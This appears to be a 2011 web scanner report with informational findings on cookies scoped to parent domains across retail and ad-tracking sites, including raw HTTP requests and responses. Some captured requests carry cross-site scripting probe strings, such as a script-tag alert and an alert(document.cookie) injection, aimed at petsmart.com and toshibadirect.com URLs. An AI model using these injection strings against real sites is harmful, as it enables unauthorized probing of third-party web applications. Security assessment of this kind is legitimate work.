GET /b/ss/gsicpet/1/H.20.3/s38054509394851?AQB=1&ndh=1&t=16/4/2011%205%3A50%3A14%201%20300&vmt=2932E0&ns=gsicpet&pageName=Home%20Page&g=http%3A//www.petsmart.com/%3F5f832--%253E%253Cscript%253Ealert%281%29%253C/script%253E3105c4c3d6e%3D1&r=http%3A//burp/show/6&ch=Home%20Page&server=www.petsmart.com&c1=Home%20Page&c2=Home%20Page&c3=Site%20Navigation&c4=Internal%20Domain&c5=New&c6=First%20page%20view%20or%20cookies%20not%20supported&c12=Home%20Page&v26=Weekday&v27=New&v28=6%3A30AM&v34=Monday&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: metrics.petsmart.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?5f832--%3E%3Cscript%3Ealert(1)%3C/script%3E3105c4c3d6e=1
Cookie: __utma=113636102.2132591238.1305543014.1305543014.1305543014.1; __utmb=113636102.1.10.1305543014; __utmc=113636102; __utmz=113636102.1305543014.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; mt.v=1.1280321277.1305543014584; s_sess=%20s_cc%3Dtrue%3B; s_pers=%20s_nr%3D1305543014601%7C1308135014601%3B%20s_lastvisit%3D1305543014602%7C1400151014602%3B%20gpv_p27%3DHome%2520Page%7C1305544814603%3B

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 10:50:16 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E880B4050116FC-60000108C015DA82[CE]; Expires=Sat, 14 May 2016 10:50:16 GMT; Domain=.petsmart.com; Path=/
Location: http://metrics.petsmart.com/b/ss/gsicpet/1/H.20.3/s38054509394851?AQB=1&pccr=true&vidn=26E880B4050116FC-60000108C015DA82&&ndh=1&t=16/4/2011%205%3A50%3A14%201%20300&vmt=2932E0&ns=gsicpet&pageName=Home%20Page&g=http%3A//www.petsmart.com/%3F5f832--%253E%253Cscript%253Ealert%281%29%253C/script%253E3105c4c3d6e%3D1&r=http%3A//burp/show/6&ch=Home%20Page&server=www.petsmart.com&c1=Home%20Page&c2=Home%20Page&c3=Site%20Navigation&c4=Internal%20Domain&c5=New&c6=First%20page%20view%20or%20cookies%20not%20supported&c12=Home%20Page&v26=Weekday&v27=New&v28=6%3A30AM&v34=Monday&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 15 May 2011 10:50:16 GMT
Last-Modified: Tue, 17 May 2011 10:50:16 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www70
Content-Length: 0
Content-Type: text/plain

12.45. http://o.toshibadirect.com/b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s3167527708356 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://o.toshibadirect.com
Path:	/b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s3167527708356

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi=[CS]v1|26E87FB0051D141D-4000013200014B2A[CE]; Expires=Sat, 14 May 2016 10:41:36 GMT; Domain=.toshibadirect.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s3167527708356?AQB=1&ndh=1&t=16%2F4%2F2011%205%3A41%3A20%201%20300&ce=UTF-8&ns=toshiba&pageName=Search%3ALaptops%20Home%20Page&g=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Flaptops.to%3Fpage%3DsegHHO%26d835f%2527-alert(document.cookie)-%252782064d64928%3D1&r=http%3A%2F%2Fburp%2Fshow%2F2&cc=USD&events=event1%2Cevent3&c1=Search&v1=D%3Dc1&h1=Search&c2=Search&v2=D%3Dc2&c3=Search&v3=D%3Dc3&h3=Referrers&c4=Search&v4=D%3Dc4&v10=Search%3ALaptops%20Home%20Page&c17=D%3Dgn&c22=New&v22=New&c23=D%3Dgn&c26=1&v26=D%3Dc26&c27=First%20Visit&v27=D%3Dc27&c41=3%3A30AM&v41=D%3Dc41&c42=Monday&v42=D%3Dc42&v44=Referrers&c45=Referrers&v45=Referrers&v46=n%2Fa&v47=n%2Fa&v48=burp&c49=WCON&v49=D%3Dc49&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=829&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: o.toshibadirect.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20omtr_eVar49%3DD%253Dc49%3B%20c_m%3Dundefinedburpburp%3B; s_pers=%20s_vnum%3D1308134480818%2526vn%253D1%7C1308134480818%3B%20s_invisit%3Dtrue%7C1305544280818%3B%20omtr_lv%3D1305542480819%7C1400150480819%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305544280819%3B%20s_nr%3D1305542480820%7C1308134480820%3B%20omtr_eVar45_cvp%3D%255B%255B'Referrers'%252C'1305542480823'%255D%255D%7C1463395280823%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305544280824%3B

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 10:41:36 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E87FB0051D141D-4000013200014B2A[CE]; Expires=Sat, 14 May 2016 10:41:36 GMT; Domain=.toshibadirect.com; Path=/
Location: http://o.toshibadirect.com/b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s3167527708356?AQB=1&pccr=true&vidn=26E87FB0051D141D-4000013200014B2A&&ndh=1&t=16%2F4%2F2011%205%3A41%3A20%201%20300&ce=UTF-8&ns=toshiba&pageName=Search%3ALaptops%20Home%20Page&g=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Flaptops.to%3Fpage%3DsegHHO%26d835f%2527-alert(document.cookie)-%252782064d64928%3D1&r=http%3A%2F%2Fburp%2Fshow%2F2&cc=USD&events=event1%2Cevent3&c1=Search&v1=D%3Dc1&h1=Search&c2=Search&v2=D%3Dc2&c3=Search&v3=D%3Dc3&h3=Referrers&c4=Search&v4=D%3Dc4&v10=Search%3ALaptops%20Home%20Page&c17=D%3Dgn&c22=New&v22=New&c23=D%3Dgn&c26=1&v26=D%3Dc26&c27=First%20Visit&v27=D%3Dc27&c41=3%3A30AM&v41=D%3Dc41&c42=Monday&v42=D%3Dc42&v44=Referrers&c45=Referrers&v45=Referrers&v46=n%2Fa&v47=n%2Fa&v48=burp&c49=WCON&v49=D%3Dc49&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=829&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 15 May 2011 10:41:36 GMT
Last-Modified: Tue, 17 May 2011 10:41:36 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www344
Content-Length: 0
Content-Type: text/plain

12.46. https://ordering.ftd.com/reminder-signin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/reminder-signin/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.47. https://ordering.ftd.com/signin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/signin/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.48. https://ordering.ftd.com/signin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/signin/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

track_id=baabe59f09870e0c5f1e6606009b9fb7e5a425b7fc231e55d6f4be1dbe08dc9c; expires=Thu, 13 May 2021 02:09:59 GMT; path=/; domain=.ftd.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.49. http://phoenix.untd.com/TRCK/RGST previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://phoenix.untd.com
Path:	/TRCK/RGST

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

WHRE=1855A_1:125DC3_0_1882A; expires=Thu, 13 May 2021 02:01:49 GMT; domain=.untd.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TRCK/RGST?AGMT=249&TIME=720&RNS=ea07e739-24b7-4742-aa1e-439f2099de73 HTTP/1.1
Host: phoenix.untd.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:49 GMT
nnCoection: close
Server: Phoenix/1.5.1
Content-Type: image/gif
Content-Length: 43
Set-Cookie: WHRE=1855A_1:125DC3_0_1882A; expires=Thu, 13 May 2021 02:01:49 GMT; domain=.untd.com; path=/
P3P: policyref="http://cyclops.prod.untd.com/common/w3c/netzero.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa OUR BUS IND PHY ONL UNI FIN COM NAV INT DEM PRE LOC"
Pragma: no-cache
Expires: Tue, 25 Apr 1995 09:30:27 -0700

GIF89a.............!.......,...........D..;

12.50. http://pix04.revsci.net/D05509/b3/0/3/noscript.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D05509/b3/0/3/noscript.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPNfEOh7gMUVmN+rJTfuGJ3lJ2WIlmH+K4lNWvB9xCh8we5B/vOPodlGvFGW0Z4wA55MvPQcWymIH2JcYlrOwkYsTo9uVScK0Ua4baBot2CPh5UPtUBFRfDxV2qCUT9ijeVsXo0496NoZxE+VT03J2BBs/L705ahQTDFMb9AsF0RDzzS9OyuyEnNSh05TjP5dAXiU0xJ68BrtFi/ZBkUn4jVTkybTRgbgbR9JGbWMf5UNUl8uA=; Domain=.revsci.net; Expires=Tue, 15-May-2012 02:02:15 GMT; Path=/
rtc_okMd=MLsvsNFKMT5nJ5GuU8+Vm/S3bm5E5k5tMt3NnMGp0iPrRxZIAPXk1sWJJd0/criBZWlpdqwlBoSERTTrYCc/gUIlS1FVffKLHMTvhZ2/kRd2fDWGXo0973OxjVJvM4sWN23lbJTGpwkPvUZano6YF0AUV+JeNaoAt8+pSbKbdnsUNCEdADOFfSeqyYTDSDEIe2vG2nUWVvCrZ+mEz9AYFmDW2hNSjGBpITTC96K7z8YQwS3lvAdlwRZUXU+bm0B6nc2R3bprYgz8eD2Ov4Fe4x5XnK8Mne17nReJOAJZHIgz5IbuNCwt4XEkjz14AaSmzHNOpukOLKJpmILuaSsa9st9voigEMZmhjkK3mkyeJhApPsJEbab/3lzTO39mzt5Z54rippve02eRS7gFHqfCoB3HzprQxzA4Cf+P+TfZnKZ89g=; Domain=.revsci.net; Expires=Tue, 15-May-2012 02:02:15 GMT; Path=/
NETSEGS_D05509=82f4957c1a652091&D05509&0&4df56fa7&0&&4dcf5b30&1f1a384c105a2f365a2b2d6af5f27c36; Domain=.revsci.net; Expires=Mon, 13-Jun-2011 02:02:15 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D05509/b3/0/3/noscript.gif?D=DM_EVT%3Dbmuk_criteo HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv39S8JaSpnph4dB7K/U2jMrlZxPiFsbBfSBcrlROJywhuHqR1r/UA1T0iRssIdAE9WG5SkuBEsQUD3IuuN09ImomKQMeFq1jtxllLl2hNvJ93zI8nQT72tjMgtUdO//9wYgRqB8ZXuPro+o7BxsBR5pxD7EXVtXGydBkVQEudXG2D2wIkNBeqHmIWJj+bGrdjGRyWixast+xLN0K4Iw+ew6ThmTEKns4HxFbcBnFLmChGZ934MWdGZXXYRWuhxS3cwBXNGIONtB2mXemfgyEqzd2IBmI9G7wogGLDx8Lw0DAp53p7JuTlqcYDDCICXYM9H2ZnYlIi4JrCJzCy8WcgNq18GmmzuaTOz/CYt2C7l9cgcwecxI15dlo8KJWy8mdmvMATQlBQZvvshGx7/ZWO+n5+L+o3XoVAx3gT2aCZHqJjly/K2Xoj1Qw67qH0PuJYpMK5P/KiQ3zOVyfP/ypI3utDRIhc08fTvQR/OwZZuegUWhFE/sq9FQhAzxOxIUTEvSResbfdfBhvTYofAJyTSyywbmhBb1MDtD0AFkYRyczjrYj2sKaFHZRb4fmzvPKfH6Zk5gmTLJV0gMS1UqtVy/S2L8TpN/clrGMHfxjNSPD5FT/EJtkm0EFhEQ27Z/cReQRxmltlL0MzcDhcs4e/wDwceblUp0um7chLLj/9/l1yBXBuwEgHk1flpVPkRmS/XI+a+2dCRvFnQSugMULpDNrA24o1pFVOIWNzLGZT2Krf+nzgF5TV38bNdoImSe5zwcruCXUG2Ktx5bQZtk7hjyijC/wmaioSX0PWNvks1FPlRUSXt/go8LnugdkWwYNOashsf6bBdytaAhOmPeOITWXSATA4ZE5SyPxGC0Znb3KDFATW1t50eAoudsHBsRbGRnxbn5H9cjPONtxL7egOM2+ltX2Nj9k3QVOzWzXEbkqT5akyVl21my7/DhratEWYI71JWlJ+9P5DWoLAVAyHTfXhezKMST83PEAtbhYhRavvp7A==; rsi_segs_1000000=pUPNcDPB7QMUFVJmHElW1WAhFpB0I5EmV+QHrdRrcAMkOX+o7LQjAQv0aGumjYcA+pD55MfuOfQbGooH3qorp++zHuX/61m4ao1z4yL4Lb3cyf2EkQb/3ZOSwdnh6MSu2Um4QVZJKClGNz2Fl9QeLKxco3pM/j3xxqXi/RBfDYQLHw069nJi4GhHujSDyULrAXw98qMzqzoEqWE=; rtc_6axN=MLsvrdMvcT5jJQFErn5VSDYGHlHr5G4IUDwGBCOQN50vl8AxTgkQ69k2sWbYhD5swupGFuttZZ30pjREZ/ZkKkhmVOC4XP9dHEpHAm3ADaku92HBduCPjDheEZyi3USKjMyJU8PKvSGf6dbgKbkkF1T9nPoTyICKBODL5dWNTWGJSo//SZoNqh0jXWrCVj5fE0hG1/Ew1855Q3kGOJISwLZwyFyrdDpPp9pEr5K7YRGtS1DhqDKb+B3xI4h5pUmK196H1VYARyez77DbY8fCN3YqmgkgAm74R4TtPLq8byYJ7dh3Jpzg7zgqcfYD+8HJFFf4m0VurVwRBH7s; rsiPus_-pah="MLsXsF8ubi5n4BCj6Iwxj+ChgP9MmEaXnPMMWCjo3/gXOBYBOsgcKGmq7J3s8bEELtEtuQAUMg2twd9L78Ckve4PRhn+TnbZZgzQjU6BafW/eRnGpuy0oiVFGmY3Anfh17v9nbyJlC6WkITH1s7atNzA94Byz2ahQWWSkgzSBeq/m5yGRHDBWVE3WQKWx1rq0Os5JD95fxkgtM/XMh8ZPItRGPdDs6DkKTj57w7NLvTrFYiNQkaAQXrvVknibEJ2Q3EEI6f88RHWUnsWlXdsumEcJ4AZQLWPtn8GUbAKtpnD2xZHycOIz+UUUTimvw1mPizedaDoQ3uueOR55nVFaPfwnliNg2DvaGTMKiNaZXNWSnvgXbxjGssTFwevLvWOYWkMVKVnyPJt2uFto8uxRa0p6J53cfm74Hg2akeLDOYR8NEH+Q6UGJLQxN+ehQIy1YbeY76PrG8="; rsi_us_1000000="pUMdJE+jMAYYlW2ENjvhvsgHgT7/5aCXkN7z8gcXCgZ1gJynnFMHqVsBOiV7rYspgf69oQGhvkYT2QspKokupFpwJRumBxvpw7cPDxvXAVU0zKSFPMS3ygCedbgjAS9oiHhUC5/j6jHxtns610mVu7thu0kvm0W1AigmkLPp4ijsHv8eAisFNrs3nvh2gMJgEKm9VRBMs7RFZkPTTn5fTNlQOhb7y5gRZlCjL3S13zOuGsx0cMAvlYgxQjr84eW9IMrhSFJX8K1sO2TOGZ63sgNBr6bl68IkMy9882nuR9lgRW33sLSL5K2g0Gbtiza9HRIyEy66iY367NNAO44QHQ6Df5BOeHejZzHIfUJAOfVVPuNv/nALwyQ1jT7eUXI/47I3dK+CIFcr1hgJDMZIta8NYHQj4TdmYVtkoEJ4gDpgYEX/QeF1KsmabHJEyD7mUMUToQpoF8s1dz1cglCSCTqaID/6pIxK2fjGISxWSaLQ30Yst1VAMgTrt8QOYUGu+y0BzQcRECjYx8BdY7kevKFhn/e4M6dJ0LCSm0klYP5YovfwCn9goB+6IQWThYuZ+1lrSHeoipKPGSeZQtjk7FORmWa6K4J8IgWDrZhEtqQQhs/+lr+Pi8n8JcgQogtlp1X3dC5uamSkgjcQjZlQCO1gfEOvztWPQ4kJXvfrC/jhbLNnyFcOfb6l+3bX+OHJSj9Wk1SsoQdwFfJxeHIjSyzo6AE8wEl4HBh7TPCVb3GQn4VapSpzVf0VdKUnq+GRsxpVTepHTifU0oKbhjRw2HJrcPbVKHEw5hwmxzvqxj9QRMjwdbqMlSiYvOoqLnf7wiFO6X8CJVULtJlZteAjCC3QQXMF8u0oj7tJsLaPEeWByepbTr8rWicdxWE2DuiNyQqSAZcc1hSX4WAqibO/kRE67l8L+1Lcvto9PvtEwrDoOwwLzMlTZ/s0MehUSospz1dV0EF/nLlo4OYsyGFiCY1j4GD01mbARJ4gFqVZzCAfmqWDH5inpgZbvg4PcB1YzlzWFTZLEH9cJf/TFL2SrSlXhtHf9udjwQ1VF0AwwPft/NiquMhNvw=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_6axN=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNfEOh7gMUVmN+rJTfuGJ3lJ2WIlmH+K4lNWvB9xCh8we5B/vOPodlGvFGW0Z4wA55MvPQcWymIH2JcYlrOwkYsTo9uVScK0Ua4baBot2CPh5UPtUBFRfDxV2qCUT9ijeVsXo0496NoZxE+VT03J2BBs/L705ahQTDFMb9AsF0RDzzS9OyuyEnNSh05TjP5dAXiU0xJ68BrtFi/ZBkUn4jVTkybTRgbgbR9JGbWMf5UNUl8uA=; Domain=.revsci.net; Expires=Tue, 15-May-2012 02:02:15 GMT; Path=/
Set-Cookie: rtc_okMd=MLsvsNFKMT5nJ5GuU8+Vm/S3bm5E5k5tMt3NnMGp0iPrRxZIAPXk1sWJJd0/criBZWlpdqwlBoSERTTrYCc/gUIlS1FVffKLHMTvhZ2/kRd2fDWGXo0973OxjVJvM4sWN23lbJTGpwkPvUZano6YF0AUV+JeNaoAt8+pSbKbdnsUNCEdADOFfSeqyYTDSDEIe2vG2nUWVvCrZ+mEz9AYFmDW2hNSjGBpITTC96K7z8YQwS3lvAdlwRZUXU+bm0B6nc2R3bprYgz8eD2Ov4Fe4x5XnK8Mne17nReJOAJZHIgz5IbuNCwt4XEkjz14AaSmzHNOpukOLKJpmILuaSsa9st9voigEMZmhjkK3mkyeJhApPsJEbab/3lzTO39mzt5Z54rippve02eRS7gFHqfCoB3HzprQxzA4Cf+P+TfZnKZ89g=; Domain=.revsci.net; Expires=Tue, 15-May-2012 02:02:15 GMT; Path=/
Set-Cookie: NETSEGS_D05509=82f4957c1a652091&D05509&0&4df56fa7&0&&4dcf5b30&1f1a384c105a2f365a2b2d6af5f27c36; Domain=.revsci.net; Expires=Mon, 13-Jun-2011 02:02:15 GMT; Path=/
X-Proc-ms: 263
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Mon, 16 May 2011 02:02:15 GMT

GIF89a.............!.......,...........D..;

12.51. http://pixel.fetchback.com/serve/fb/pdc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/serve/fb/pdc

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

cmp=1_1305510847_11939:0_5512:45459; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
uid=1_1305510847_1305465388147:4406953890584386; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
kwd=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
sit=1_1305510847_3166:647:0_3167:675:9_1888:45459:45459; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
cre=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
bpd=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
apd=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
scg=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
ppd=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
afl=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=3166 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1305510838_11939:638_5512:45450; uid=1_1305510838_1305465388147:4406953890584386; kwd=1_1305510838; sit=1_1305510838_3166:638:638_3167:666:0_1888:45450:45450; cre=1_1305510838; bpd=1_1305510838; apd=1_1305510838; scg=1_1305510838; ppd=1_1305510838; afl=1_1305510838

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:07 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1305510847_11939:0_5512:45459; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: uid=1_1305510847_1305465388147:4406953890584386; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: kwd=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: sit=1_1305510847_3166:647:0_3167:675:9_1888:45459:45459; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: cre=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: bpd=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: apd=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: scg=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: ppd=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Set-Cookie: afl=1_1305510847; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 16 May 2011 01:54:07 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 290


<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(tim
...[SNIP]...

12.52. http://pixel.fetchback.com/serve/fb/ver previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/serve/fb/ver

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=1_1305543177_1302186535420:5639073448711300; Domain=.fetchback.com; Expires=Sat, 14-May-2016 10:52:57 GMT; Path=/
cre=1_1305543177; Domain=.fetchback.com; Expires=Sat, 14-May-2016 10:52:57 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/ver?uatFilter=false&fb_key=pixel.fetchback.comcat%3D%26name%3Dlanding%26sid%3D3166http%3A%2F%2Fwww.gnc.com%2Fhome%2Findex.jsp%3Frdir%3D1a+%2Fserve%2Ffb%2Fpdc&cat=&sid=3166&name=landing&uid=1302186535420%3A5639073448711300&crv=0.0&oid=Unknown HTTP/1.1
Host: pixel.fetchback.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3166
Cookie: cmp=1_1305543176_11939:0; uid=1_1305543176_1302186535420:5639073448711300; kwd=1_1305543176; sit=1_1305543176_3166:0:0_3295:3356641:3354563; cre=1_1305543176; bpd=1_1305543176; apd=1_1305543176; scg=1_1305543176; ppd=1_1305543176; afl=1_1305543176

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:52:57 GMT
Server: Apache/2.2.3 (CentOS)
